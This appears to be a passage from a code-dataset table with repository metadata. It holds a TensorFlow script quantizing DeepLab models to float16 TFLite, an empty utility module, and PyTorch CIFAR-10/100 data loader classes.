] | 1,529 | 2019-12-11T13:36:23.000Z | 2022-03-31T18:38:27.000Z | 21_edgetpu-deeplab-slim/01_float32/05_float16_quantization.py | khanfarhan10/PINTO_model_zoo | 4cad2e506d8c0fb604aa7b5f84115a840ab59ba1 | [
"MIT"
] | 200 | 2020-01-06T09:24:42.000Z | 2022-03-31T17:29:08.000Z | 21_edgetpu-deeplab-slim/01_float32/05_float16_quantization.py | khanfarhan10/PINTO_model_zoo | 4cad2e506d8c0fb604aa7b5f84115a840ab59ba1 | [
"MIT"
] | 288 | 2020-02-21T14:56:02.000Z | 2022-03-30T03:00:35.000Z | ### Tensorflow v1.15.2
import tensorflow as tf
# Float16 Quantization - Input/Output=float32
graph_def_file="frozen_inference_graph_257_os16.pb"
input_arrays=["ImageTensor"]
output_arrays=['ArgMax']
input_tensor={"ImageTensor":[1,257,257,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_257_os16_float16_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_257_os16_float16_quant.tflite")
# Float16 Quantization - Input/Output=float32
graph_def_file="frozen_inference_graph_257_os32.pb"
input_arrays=["ImageTensor"]
output_arrays=['ArgMax']
input_tensor={"ImageTensor":[1,257,257,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_257_os32_float16_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_257_os32_float16_quant.tflite")
# Float16 Quantization - Input/Output=float32
graph_def_file="frozen_inference_graph_321_os16.pb"
input_arrays=["ImageTensor"]
output_arrays=['ArgMax']
input_tensor={"ImageTensor":[1,321,321,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_321_os16_float16_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_321_os16_float16_quant.tflite")
# Float16 Quantization - Input/Output=float32
graph_def_file="frozen_inference_graph_321_os32.pb"
input_arrays=["ImageTensor"]
output_arrays=['ArgMax']
input_tensor={"ImageTensor":[1,321,321,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_321_os32_float16_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_321_os32_float16_quant.tflite")
# Float16 Quantization - Input/Output=float32
graph_def_file="frozen_inference_graph_513_os16.pb"
input_arrays=["ImageTensor"]
output_arrays=['ArgMax']
input_tensor={"ImageTensor":[1,513,513,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_513_os16_float16_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_513_os16_float16_quant.tflite")
# Float16 Quantization - Input/Output=float32
graph_def_file="frozen_inference_graph_513_os32.pb"
input_arrays=["ImageTensor"]
output_arrays=['ArgMax']
input_tensor={"ImageTensor":[1,513,513,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_513_os32_float16_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_513_os32_float16_quant.tflite")
# Float16 Quantization - Input/Output=float32
graph_def_file="frozen_inference_graph_769_os16.pb"
input_arrays=["ImageTensor"]
output_arrays=['ArgMax']
input_tensor={"ImageTensor":[1,769,769,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_769_os16_float16_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_769_os16_float16_quant.tflite")
# Float16 Quantization - Input/Output=float32
graph_def_file="frozen_inference_graph_769_os32.pb"
input_arrays=["ImageTensor"]
output_arrays=['ArgMax']
input_tensor={"ImageTensor":[1,769,769,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_quant_model = converter.convert()
with open('./edgetpu_deeplab_slim_769_os32_float16_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Float16 Quantization complete! - edgetpu_deeplab_slim_769_os32_float16_quant.tflite") | 49.635514 | 111 | 0.824515 | 736 | 5,311 | 5.580163 | 0.074728 | 0.07402 | 0.046749 | 0.058437 | 0.991478 | 0.991478 | 0.991478 | 0.991478 | 0.986121 | 0.986121 | 0 | 0.056891 | 0.060064 | 5,311 | 107 | 112 | 49.635514 | 0.765825 | 0.069667 | 0 | 0.719101 | 0 | 0 | 0.322921 | 0.22069 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.011236 | 0 | 0.011236 | 0.089888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8a850d85168829154d651cefc0ad2cf456b90498 | 143 | py | Python | safeai/utils/utils.py | HanbumKo/SafeAI | ad7e5d66abcfe82b0de260b606853bddb68e68ee | [
"MIT"
] | 13 | 2018-11-02T12:10:01.000Z | 2020-05-18T17:38:25.000Z | safeai/utils/utils.py | HanbumKo/SafeAI | ad7e5d66abcfe82b0de260b606853bddb68e68ee | [
"MIT"
] | 2 | 2018-11-15T06:16:06.000Z | 2018-11-19T15:23:04.000Z | safeai/utils/utils.py | HanbumKo/SafeAI | ad7e5d66abcfe82b0de260b606853bddb68e68ee | [
"MIT"
] | 4 | 2018-11-23T05:59:43.000Z | 2020-08-28T04:21:27.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# General utility functions here
| 23.833333 | 38 | 0.867133 | 18 | 143 | 6.111111 | 0.611111 | 0.272727 | 0.436364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125874 | 143 | 5 | 39 | 28.6 | 0.88 | 0.20979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8a86a50879a358deccea4ea2988e65f3b8ea3192 | 3,600 | py | Python | cifar.py | jramapuram/datasets | 270e189393fedecb4e4df68ea59600e3005b67ec | [
"MIT"
] | 4 | 2020-07-28T08:47:31.000Z | 2021-03-24T08:33:58.000Z | cifar.py | jramapuram/datasets | 270e189393fedecb4e4df68ea59600e3005b67ec | [
"MIT"
] | 2 | 2020-12-24T04:08:42.000Z | 2021-05-12T13:00:01.000Z | cifar.py | jramapuram/datasets | 270e189393fedecb4e4df68ea59600e3005b67ec | [
"MIT"
] | 1 | 2018-07-24T08:52:01.000Z | 2018-07-24T08:52:01.000Z | import functools
from torchvision import datasets
from .abstract_dataset import AbstractLoader
class CIFAR10Loader(AbstractLoader):
"""Simple CIFAR10 loader, there is no validation set."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
cuda=True, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(datasets.CIFAR10, root=path, train=True, download=True)
test_generator = functools.partial(datasets.CIFAR10, root=path, train=False, download=True)
super(CIFAR10Loader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
self.output_size = 10 # fixed
self.loss_type = 'ce' # fixed
# grab a test sample to get the size
test_img, _ = self.train_loader.__iter__().__next__()
self.input_shape = list(test_img.size()[1:])
print("derived image shape = ", self.input_shape)
class CIFAR100Loader(AbstractLoader):
"""Simple CIFAR100 loader, there is no validation set."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
cuda=True, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(datasets.CIFAR100, root=path, train=True, download=True)
test_generator = functools.partial(datasets.CIFAR100, root=path, train=False, download=True)
super(CIFAR100Loader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
self.output_size = 100 # fixed
self.loss_type = 'ce' # fixed
# grab a test sample to get the size
test_img, _ = self.train_loader.__iter__().__next__()
self.input_shape = list(test_img.size()[1:])
print("derived image shape = ", self.input_shape)
| 52.173913 | 100 | 0.565 | 345 | 3,600 | 5.533333 | 0.2 | 0.09429 | 0.06286 | 0.069146 | 0.891566 | 0.891566 | 0.891566 | 0.868518 | 0.839183 | 0.839183 | 0 | 0.014893 | 0.365833 | 3,600 | 68 | 101 | 52.941176 | 0.821288 | 0.079722 | 0 | 0.734694 | 0 | 0 | 0.014568 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.061224 | 0 | 0.142857 | 0.040816 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.